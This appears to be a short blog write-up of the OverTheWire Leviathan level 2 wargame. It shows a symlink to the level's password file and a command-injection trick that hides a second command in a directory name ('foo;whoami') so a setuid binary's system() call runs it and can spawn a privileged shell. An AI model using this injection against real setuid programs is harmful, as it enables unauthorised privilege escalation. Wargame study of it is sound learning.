leviathan level 2 overthewire - updated challenge

leviathan 2 overthewire setreuid(12002, 12002)

start by making a folder with our "mktemp -d", make a file, and ltrace ./printfile <your file>
most tutorials will show you how to get this done with a link file, which are good tutorials and test cases as they are, read them.

trying that...  INSIDE our tmp folder
ln -s /etc/leviathan_pass/leviathan3 /tmp/tmp.ydhTgRu2oq/b
ltrace ~/printfile /tmp/tmp.ydhTgRu2oq/a\ b
will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: Permission denied
this is because these 2 lines
geteuid() 
setreuid(12002, 12002) 

but, i guess that was not the hack, and in the end we see that the final line executing is
anyway, like above or doing just a file named "a b" and another named "b" will output
system("/bin/cat /tmp/tmp.ydhTgRu2oq/a b"...1
/bin/cat: b: No such file or directory

the important thing "cat" command did try to concat.

but to the real hack... make a folder in your tmp like this 'mkdir "foo;whoami"'
now run:
ltrace ~/printfile "/tmp/tmp.ydhTgRu2oq/foo;whoami"
output:
system("/bin/cat /tmp/tmp.ydhTgRu2oq/foo".../bin/cat: /tmp/tmp.ydhTgRu2oq/foo: Is a directory
leviathan2
that means that since the file give cat out folder name as a string, as long as we can chain shell commands in the folder name it will be executed... slashes (/) and backslashes (\) are out.

HINT: keep your mind with the simple default commands which are all here "/bin" 
or "ls /bin"





SPOILER ALERT







p.s. starting a bash shell is just running the command bash


Comments

Popular posts from this blog

Asp.Net Ending Response options, Response.End() vs CompleteRequest()

c# Service Play Sound with NAudio example by Moshe

MatDatePicker Errors